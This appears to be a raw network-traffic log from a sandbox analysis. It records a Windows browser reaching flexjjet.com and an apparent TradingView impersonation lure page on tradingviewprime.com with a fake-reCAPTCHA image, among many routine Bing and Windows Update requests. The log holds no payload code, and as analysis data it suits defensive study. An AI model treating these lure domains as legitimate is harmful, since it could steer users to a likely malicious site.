Source: global traffic HTTP traffic detected: GET /?type=3 HTTP/1.1host: flexjjet.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6ecookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDN9LFwiY2FtcGFpZ25zXCI6e1wiMTEzXCI6MTc0OTUwMjA0M30sXCJ0aW1lXCI6MTc0OTUwMjA0M30ifQ.io15MZ8hAmszvEd6-fhL5GBD-J4okyPU3j_xJ2ROQAEpriority: u=0, i
Source: global traffic HTTP traffic detected: GET /lander/tradingview/index.html HTTP/1.1host: tradingviewprime.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://flexjjet.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://tradingviewprime.com/lander/tradingview/index.htmlaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /releases/v5.0.0/css/all.css HTTP/1.1host: use.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://tradingviewprime.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /releases/v5.0.0/webfonts/fa-brands-400.woff2 HTTP/1.1host: use.fontawesome.comorigin: https://tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://use.fontawesome.com/releases/v5.0.0/css/all.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic HTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/aLwn0Je_zO1JrjbMTOSuB-i7FUM.css?bu=Me4K5wr0CucK2gvnCuAL5wrrC-cK8gvnCvgL5wr-C-cKhAznCoYL5wqMC-cKgAvnCucK0QvnCpsL5wqhC-cKlQvnCucKsAuzC-cK5wrOC7wL5wrCC8UL5wqwDOcKigznCu4M&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdoM5wrnCucK5wrnCucK5wrnCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ag5MNrHoG4V6seK&MD=DbLwmtSk HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /rp/1EE7kbht1gjefYNX4DWLhQUytwE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
